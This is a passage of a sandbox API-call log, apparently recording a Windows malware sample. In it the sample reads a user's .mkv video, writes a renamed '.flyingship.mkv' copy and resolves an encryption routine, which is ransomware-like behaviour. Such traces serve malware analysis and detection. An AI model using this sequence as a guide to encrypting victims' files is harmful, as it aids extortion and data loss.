| out: lpMsg=0x87ee3c) returned 0 [0199.705] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.705] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.706] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.706] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0199.706] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.706] CryptDestroyHash (hHash=0x90ae18) returned 1 [0199.706] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.706] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.706] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.706] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.706] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.707] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth\\syi8lj9.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0199.707] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.707] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0199.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0199.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0199.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0199.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0199.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0199.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0199.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0199.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0199.707] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0199.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0199.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0199.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0199.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0199.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0199.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0199.708] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0199.708] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0199.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0199.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0199.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0199.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0199.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0199.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0199.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0199.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0199.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0199.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0199.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0199.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0199.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0199.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0199.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0199.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0199.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0199.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0199.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0199.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0199.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0199.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0199.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0199.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0199.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0199.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0199.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0199.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9100 [0199.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0199.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0199.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0199.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fff18 [0199.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9100 | out: hHeap=0x8a0000) returned 1 [0199.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0199.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0199.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0199.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0199.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0199.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0199.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0199.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0199.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0199.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0199.709] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth")) returned 0x10 [0199.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0199.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0199.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff18 | out: hHeap=0x8a0000) returned 1 [0199.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0199.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0199.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0199.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0199.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0199.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0199.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0199.710] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.flyingship.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth\\syi8lj9.flyingship.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0199.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0199.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0199.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0199.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0199.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0199.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0199.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0199.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0199.711] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0199.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0199.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0199.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0199.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0199.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0199.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0199.711] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0199.711] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0199.711] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0199.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0199.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0199.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0199.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0199.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0199.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0199.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0199.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0199.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0199.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0199.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0199.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0199.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0199.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0199.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0199.712] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0199.712] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0199.715] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x6b05, lpOverlapped=0x0) returned 1 [0199.716] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0199.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0199.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0199.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0199.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0199.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x16b05) returned 0xbea018 [0199.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0199.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0199.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0199.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0199.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0199.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0199.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x16b05) returned 0xa5f008 [0199.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0199.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0199.719] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 1 [0199.720] TranslateMessage (lpMsg=0x87f36c) returned 0 [0199.720] DispatchMessageW (lpMsg=0x87f36c) returned 0x0 [0199.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0199.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0199.720] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87ea08) returned 1 [0199.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0199.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0199.721] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0199.721] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0199.721] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0199.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0199.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0199.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0199.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0199.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x16b05) returned 0xbea018 [0199.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0199.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0199.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0199.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0199.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0199.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0199.722] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0199.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0199.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0199.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0199.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0199.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0199.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0199.722] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0199.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0199.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0199.722] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0199.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0199.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0199.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2748 [0199.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0199.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0199.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0199.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0199.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x16b05) returned 0xbea018 [0199.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0199.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27f8 [0199.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0199.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0199.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0199.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27e8 [0199.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0199.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0199.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0199.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2838 [0199.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0199.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0199.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0199.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd858 [0199.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0199.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0199.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0199.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0199.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0199.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x16b05) returned 0xa75b18 [0199.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0199.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0199.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0199.724] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0199.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0199.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0199.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0199.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0199.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0199.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0199.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0199.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0199.724] 